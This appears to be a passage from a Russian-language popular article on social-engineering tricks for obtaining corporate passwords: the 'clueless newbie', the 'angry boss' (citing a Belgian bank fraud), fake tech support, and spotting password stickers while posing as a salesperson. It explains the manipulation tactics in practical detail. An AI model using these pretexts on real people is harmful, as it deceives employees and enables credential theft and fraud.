Это – один из хрестоматийных примеров того, как хакер может завладеть паролем для доступа в корпоративную систему. Особенно он актуален для крупных компаний, где многие сотрудники зачастую не знакомы друг с другом. Хакеру достаточно связаться с одним из сотрудников по телефону или электронной почте и выдать себя за глупого новичка. Кончено, многое тут зависит от везения. Нужно изначально не ошибиться и выбрать в качестве живой «уязвимости» доверчивого и сердобольного человека, готового помочь неопытному «коллеге».
Аккуратно расспрашивая сотрудника и жалуясь на то, что «ничего не получается», хакер выманивает у него пароль для доступа в систему. А далее – дело техники.

Большой и злой босс
Прием, обыгранный в массе шпионских фильмов, но не потерявший актуальности. Вы наверняка видели в каком-нибудь кино, как герой звонит, к примеру, на контрольно-пропускной пункт, прикидывается злым генералом и требует от робеющих дежурных немедленно что-то сообщить или кого-то пропустить.
Пример довольно утрированный, но даже в 2016 году с помощью подобной уловки хакеры умудряются грабить банки. Ярчайший пример – в январе злоумышленники похитили из крупного бельгийского банка 70 млн. евро. Хакер направил одному из менеджеров финансового отдела гневное письмо, где представился одним из важных клиентов банка. «Клиент» сердился и спрашивал, какого дьявола банк задерживает проведение невероятно важной транзакции. Сотрудник испугался и перевел деньги, не особо вдаваясь в проверки присланных документов, подделанных при помощи фотошопа.
К слову, этот метод отлично совмещается с «глупым новичком». То т же «большой и злой генерал» может позвонить подчиненным и потребовать объяснений, почему у него что-то не работает. Главное в этом деле – харизма и убедительность. Гнев, глупость и самодурство должны «большого босса» выглядеть достаточно естественно и быть достаточно интенсивными, чтобы жертва не смогла собраться с мыслями и просто не успела усомниться в происходящем.

Техподдержка
Несмотря на возросшую компьютерную грамотность, при желании Вы все еще легко отыщете людей, мечтающих о наличии на клавиатуре кнопки «сделать всё хорошо». Это – тот самый скорбный разумом контингент, который никогда «ничего не нажимал, всё само сломалось». Такие люди – настоящая находка. Потому хакеру достаточно позвонить им и сказать что-то вроде «Я N из техподдержки, мне сообщили, что у вас проблемы с компьютером». У жертвы гарантированно обнаружатся «проблемы с компьютером», будь то исчезнувшая линейка в Microsoft Word или заблокированные админом «Одноклассники». В ходе решения таких «проблем» пользователь поверит едва ли не каждому слову хакера и с радостью продиктует ему всё что угодно, включая логин, пароль и паспортные данные собственной бабушки.

Пиццу заказывали?
Если Вы работаете в крупном офисе, оглядитесь вокруг. Посмотрите на компьютеры коллег. Наверняка на чем-нибудь мониторе вы обнаружите липкий стикер, где записаны все необходимые пароли для входа в систему. Таким образом, внимательному и зоркому хакеру нужно лишь найти способ попасть в офис. Способов для этого может быть масса. К примеру, ни для кого не секрет, что иногда по офисным зданиям ходят «бродячие продавцы», предлагая местным обитателям разнообразную косметику, книги или прочий товар. Нет никаких гарантий, что один из таких продавцов, войдя в помещение, не начнет высматривать на чьем-нибудь мониторе бумажку с паролями.
Следует отметить, что в случае с большими корпорациями этот метод не сработает, так как они на свою территорию посторонних, как правило, не пропускают. Но если Ваша компания снимает офис в местом Доме Быта, то нет никаких гарантий, что паренек-курьер, который полчаса назад ошибся дверью, этим же вечером не попытается взломать Вашу базу данных.